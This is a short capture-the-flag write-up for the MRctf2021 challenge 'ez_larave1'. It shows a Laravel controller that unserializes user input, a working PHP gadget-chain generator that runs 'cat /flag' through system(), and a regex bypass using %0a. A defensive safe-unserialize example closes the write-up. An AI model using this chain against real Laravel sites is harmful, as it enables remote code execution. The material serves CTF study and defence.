MRctf2021
ez_larave1
Sigh... I only managed to solve this one sign-in challenge.
I originally assumed it would be like 2020, where you had to find the POP chain yourself; I just couldn't find one and, being that bad, gave up, only for a search to turn up a CVE...
First, find the deserialization entry point:
TaskController.php:
```php
class TaskController {
    public function index(){
        if(isset($_GET['action']) && preg_match('/serialize\/*$/i', $_GET['action'])){
            exit(1);
        }
        if(preg_match('/serialize/i', basename( $_GET['action']))){
            if(isset($_GET['ser'])){
                $ser = $_GET['ser'];
                unserialize($ser);
                return ;
            }else{
                echo "no unserialization";
                return ;
            }
        }
    }
}
```
The index method...
Something I learned here: first look up how the framework in question loads its routes, then read the routes:
https://laravelacademy.org/post/8731.html
web.php:
```php
Route::get('/', function () {
    return view('welcome');
});

Route::get('/hello','TaskController@index');
```
When /hello is requested, the index method of the TaskController class is loaded; this is the submission point.
Exploitation method: the CVE
```php
<?php
namespace Illuminate\Broadcasting{
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($events="",$event="") {
            $this->events = $events;
            $this->event = $event;
        }
    }
}
namespace Illuminate\Bus{
    class Dispatcher {
        protected $queueResolver = "system";
    }
}
namespace Illuminate\Broadcasting{
    class BroadcastEvent {
        public $connection = "cat /flag";
    }
}
namespace{
    $d = new Illuminate\Bus\Dispatcher();
    $b = new Illuminate\Broadcasting\BroadcastEvent();
    $p = new Illuminate\Broadcasting\PendingBroadcast($d,$b);
    echo urlencode(serialize($p));
}
?>
```
Too much of a noob, so I just grabbed a script... That regex check can be bypassed simply by polluting the input with a space + %0a.
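As an added defensive example (not code from the writeup or from Laravel): the controller above filters only the `action` parameter and passes `ser` to unserialize() with no restriction, so the effective control has to sit on that call. The snippet feeds a data-only stand-in of the writeup's PendingBroadcast object into a wrapper that disables class instantiation; the class stub, `safe_unserialize()` and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not part of the original writeup. The class below is a
// data-only stand-in for Illuminate\Broadcasting\PendingBroadcast so that
// the writeup's payload shape can be produced without Laravel installed.
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($events = "", $event = "") {
            $this->events = $events;
            $this->event  = $event;
        }
    }
}

namespace {
    // Constructed helper: unserialize with object instantiation disabled.
    // allowed_classes => false turns every O:/C: record into
    // __PHP_Incomplete_Class, so no class from a gadget chain is loaded and
    // no __wakeup()/__destruct() can fire. Any object left in the result,
    // at any depth, is then treated as a reason to reject the whole input.
    function safe_unserialize(string $data) {
        $value = @unserialize($data, ['allowed_classes' => false]);
        if ($value === false && $data !== 'b:0;') {
            return null;                           // malformed input
        }
        $stack = [$value];
        while ($stack) {
            $v = array_pop($stack);
            if (is_object($v)) {
                return null;                       // an object survived: reject
            }
            if (is_array($v)) {
                foreach ($v as $child) {
                    $stack[] = $child;
                }
            }
        }
        return $value;
    }

    // Constructed sample: same outer object as the writeup's generator, with
    // plain strings where the nested gadget objects would be.
    $payload = serialize(new Illuminate\Broadcasting\PendingBroadcast("x", "y"));
    var_dump(get_class(unserialize($payload)));    // unrestricted call: the class is instantiated
    var_dump(safe_unserialize($payload));          // wrapper: the object-carrying input is rejected
    var_dump(safe_unserialize(serialize(['id' => 7])));   // wrapper: plain scalar/array data still passes
}
```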